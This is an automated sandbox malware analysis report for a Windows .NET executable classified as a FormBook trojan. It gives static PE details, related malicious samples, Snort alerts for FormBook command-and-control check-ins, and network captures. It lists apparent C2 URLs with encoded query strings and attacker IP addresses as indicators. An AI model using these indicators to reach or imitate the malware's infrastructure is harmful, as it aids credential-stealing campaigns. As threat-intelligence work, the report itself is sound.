                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:29
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@7/1@12/8
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 10.6% (good quality ratio 9.1%)
                                                                        • Quality average: 70.1%
                                                                        • Quality standard deviation: 34.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 92.122.145.220, 52.255.188.83, 184.30.20.56, 20.82.209.183, 2.20.142.209, 2.20.143.16, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.50.102.62
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/412121/sample/457b22da_by_Libranalysis.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        12:24:27API Interceptor1x Sleep call for process: 457b22da_by_Libranalysis.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        52.128.23.153in.exeGet hashmaliciousBrowse
                                                                        • www.industry-automation.com/sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0
                                                                        REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • www.ferienschweden.com/dxe/?rL=s6Sqq23Nqxy6Bqc8f3MZosvGevB33GzO29fOayP/lE01Eq/eDpu6VUP0sUjGcOqZY2dQdVIRww==&2dqLWB=RXBtNzex
                                                                        krJF4BtzSv.exeGet hashmaliciousBrowse
                                                                        • www.onlineregular.com/oerg/?YL0=8pN4l4&r6A=k0e2T7kvJRK3PRo8y62ai84DWcjvpnsau5YF2j19mIw29CJGigOXt8G+epDiy588L3Hg
                                                                        PO_29_00412.exeGet hashmaliciousBrowse
                                                                        • www.neutrasystems.com/hw6d/?rVEt3p=S0D0v04&SPx=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcYkTRslbbC22qjAVDA==
                                                                        DHL_S390201.exeGet hashmaliciousBrowse
                                                                        • www.tenply.com/u2gd/?IDKPY0x=oAZBYkqsTuez1a9u+6lVnWcl/HQJuhuD2QvfP8fo+EoX0nK3YZBMl6AGY1vurgdkUfL4&Rnm=XPc43lnxP
                                                                        y6f8O0kbEB.exeGet hashmaliciousBrowse
                                                                        • www.clipsq.com/oerg/?mHLD_0=ujOXmawhwZWKFGghDr7+X4b1OYMZgrDZqeyOmZXhZPmqT7kE0LgD8cS3WUAvTIFghox1&ndndnZ=UtWlYrO0rhjH
                                                                        scan copy 2402021.exeGet hashmaliciousBrowse
                                                                        • www.ehealthak.com/edbs/?pPX=pO0puah+4fLWu/gaJSPwUdJ/22y0P48FdV7vJ0SmK5Njq7Vx485zU7W8W0MYJNonfaHF&1bj=jlK0MdGxr
                                                                        Betaling_advies.exeGet hashmaliciousBrowse
                                                                        • www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
                                                                        50729032021.xlsxGet hashmaliciousBrowse
                                                                        • www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
                                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
                                                                        Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                        • www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
                                                                        9V3LjvhSMb.exeGet hashmaliciousBrowse
                                                                        • www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
                                                                        RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                        • www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
                                                                        gV8xdP8bas.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
                                                                        m5bCbJdk7l.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
                                                                        xloa.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
                                                                        rbyB1UHXxR.exeGet hashmaliciousBrowse
                                                                        • www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
                                                                        4137.exeGet hashmaliciousBrowse
                                                                        • www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
                                                                        COAU7229898130.xlsxGet hashmaliciousBrowse
                                                                        • www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE
                                                                        202.210.8.861c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                        • www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        www.thepocket-onlinelesson.xyz1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                        • 202.210.8.86

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        UNIFIEDLAYER-AS-1USabc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                        • 67.20.76.71
                                                                        Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                        • 192.185.171.219
                                                                        DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                        • 162.241.169.22
                                                                        dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                        • 192.185.171.219
                                                                        RFQ.exeGet hashmaliciousBrowse
                                                                        • 192.185.129.32
                                                                        Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                        • 162.241.62.63
                                                                        in.exeGet hashmaliciousBrowse
                                                                        • 162.241.244.112
                                                                        PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                        • 162.144.13.239
                                                                        catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                        • 108.167.180.164
                                                                        catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                        • 108.167.180.164
                                                                        export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                        • 108.179.232.90
                                                                        XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                        • 162.241.190.216
                                                                        QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                        • 108.179.232.90
                                                                        15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.115.105
                                                                        e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                        • 162.241.190.216
                                                                        SOA PDF.exeGet hashmaliciousBrowse
                                                                        • 192.185.226.148
                                                                        djBLaxEojp.exeGet hashmaliciousBrowse
                                                                        • 192.185.161.67
                                                                        quotation 35420PDF.exeGet hashmaliciousBrowse
                                                                        • 192.185.41.225
                                                                        REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                                                                        • 162.241.24.59
                                                                        551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                        • 192.185.138.180
                                                                        VECTANTARTERIANetworksCorporationJP1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                        • 202.210.8.86
                                                                        Purchase Inquiry 11.05.2021.exeGet hashmaliciousBrowse
                                                                        • 202.210.8.60
                                                                        0876543123.exeGet hashmaliciousBrowse
                                                                        • 202.210.8.120
                                                                        Project Decision 2021.exeGet hashmaliciousBrowse
                                                                        • 183.181.86.59
                                                                        S4gONKzrzB.exeGet hashmaliciousBrowse
                                                                        • 210.131.150.117
                                                                        PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                                                        • 202.210.8.149
                                                                        VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                                                        • 202.210.8.149
                                                                        MGuvcs6OczGet hashmaliciousBrowse
                                                                        • 157.14.182.109
                                                                        SWIFT COPY.exeGet hashmaliciousBrowse
                                                                        • 103.141.96.11
                                                                        9JFrEPf5w7.exeGet hashmaliciousBrowse
                                                                        • 103.15.186.68
                                                                        Purchase Order.xlsxGet hashmaliciousBrowse
                                                                        • 103.15.186.68
                                                                        PO91361.exeGet hashmaliciousBrowse
                                                                        • 103.15.186.10
                                                                        ccavero@hycite.com.htmGet hashmaliciousBrowse
                                                                        • 203.114.55.132
                                                                        MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                                        • 202.210.8.141
                                                                        SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                        • 202.210.8.141
                                                                        MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                                        • 120.51.34.254
                                                                        SHED.EXEGet hashmaliciousBrowse
                                                                        • 103.141.96.21
                                                                        swift copy pdf.exeGet hashmaliciousBrowse
                                                                        • 183.181.84.122
                                                                        shipping docs of MT20410.exeGet hashmaliciousBrowse
                                                                        • 183.181.84.122
                                                                        PO#4503527426.xlsxGet hashmaliciousBrowse
                                                                        • 43.249.241.188
                                                                        DOSARRESTUSin.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        krJF4BtzSv.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        PO_29_00412.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        DHL_S390201.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        y6f8O0kbEB.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        scan copy 2402021.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Betaling_advies.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.218
                                                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        bank details.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.218
                                                                        50729032021.xlsxGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        9V3LjvhSMb.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        gV8xdP8bas.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        m5bCbJdk7l.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        xloa.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153
                                                                        rbyB1UHXxR.exeGet hashmaliciousBrowse
                                                                        • 52.128.23.153

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.log
                                                                        Process:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1314
                                                                        Entropy (8bit):5.350128552078965
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
                                                                        MD5:8198C64CE0786EABD4C792E7E6FC30E5
                                                                        SHA1:71E1676126F4616B18C751A0A775B2D64944A15A
                                                                        SHA-256:C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
                                                                        SHA-512:EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.70861569543812
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:457b22da_by_Libranalysis.exe
                                                                        File size:973824
                                                                        MD5:457b22da77d4db093a31dd80a4b8963f
                                                                        SHA1:83dc32633108d309f6b6b50a42dc102e7375f54c
                                                                        SHA256:8dc4c1a88f19df4a3731991e632688147b6132bcb6cffa2dfbef8ee081c6ddae
                                                                        SHA512:988bc10454baea85766b9af43d51073a155b17c63525795b55984e362b81e2e11717b947ce11c05d010682f8b92f5c73cc3918401b23cbaa44bfe976dec6d45e
                                                                        SSDEEP:24576:0Fu7fEF8VAJUFZ+MEEcg1B3DBp3LQySL683Olkck:oKeco9gXdBs681c
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..`..............P.............. ....... ....@.. .......................@............@................................

                                                                        File Icon

                                                                        Icon Hash:c4b2f0f0f0f0b2c4

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4f200a
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x609B8954 [Wed May 12 07:52:52 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [004F2000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb887c0x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x2b910.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xf20000x8
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0xb80000x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        U#j;F_`0x20000xb58300xb5a00False1.00031723159data7.99977911602IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .text0xb80000xbe880xc000False0.443664550781data5.98775061458IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xc40000x2b9100x2ba00False0.166323424069data4.59329432672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xf00000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        0xf20000x100x200False0.044921875data0.142635768149IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0xc42e00x2f94PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                        RT_ICON0xc72740x10828dBase III DBT, version number 0, next free block index 40
                                                                        RT_ICON0xd7a9c0x94a8data
                                                                        RT_ICON0xe0f440x5488data
                                                                        RT_ICON0xe63cc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4278648832
                                                                        RT_ICON0xea5f40x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xecb9c0x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                        RT_ICON0xedc440x988data
                                                                        RT_ICON0xee5cc0x468GLS_BINARY_LSB_FIRST
                                                                        RT_GROUP_ICON0xeea340x84data
                                                                        RT_GROUP_ICON0xeeab80x14data
                                                                        RT_VERSION0xeeacc0x3dcdata
                                                                        RT_MANIFEST0xeeea80xa65XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyrightCopyright 2013
                                                                        Assembly Version3.0.0.0
                                                                        InternalNameDynamicPartitionEnumeratorForIndexRangeAbstract.exe
                                                                        FileVersion3.0.0.0
                                                                        CompanyName
                                                                        LegalTrademarks
                                                                        Comments
                                                                        ProductNameServerManager_Core
                                                                        ProductVersion3.0.0.0
                                                                        FileDescriptionServerManager_Core
                                                                        OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        05/12/21-12:25:36.062502TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.95.69.141
                                                                        05/12/21-12:25:36.062502TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.95.69.141
                                                                        05/12/21-12:25:36.062502TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.334.95.69.141
                                                                        05/12/21-12:26:02.702057TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3156.252.96.189
                                                                        05/12/21-12:26:02.702057TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3156.252.96.189
                                                                        05/12/21-12:26:02.702057TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3156.252.96.189
                                                                        05/12/21-12:26:30.319867TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.3184.168.131.241
                                                                        05/12/21-12:26:30.319867TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.3184.168.131.241
                                                                        05/12/21-12:26:30.319867TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.3184.168.131.241

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 12, 2021 12:25:24.196033955 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:24.380028963 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.380197048 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:24.565099001 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.565185070 CEST4972880192.168.2.352.128.23.153
                                                                        May 12, 2021 12:25:24.747908115 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.747936010 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.747955084 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.747977018 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.747996092 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.748023033 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.748044968 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.748064041 CEST804972852.128.23.153192.168.2.3
                                                                        May 12, 2021 12:25:24.748070955 CEST4972880192.168.2.352.128.23.153
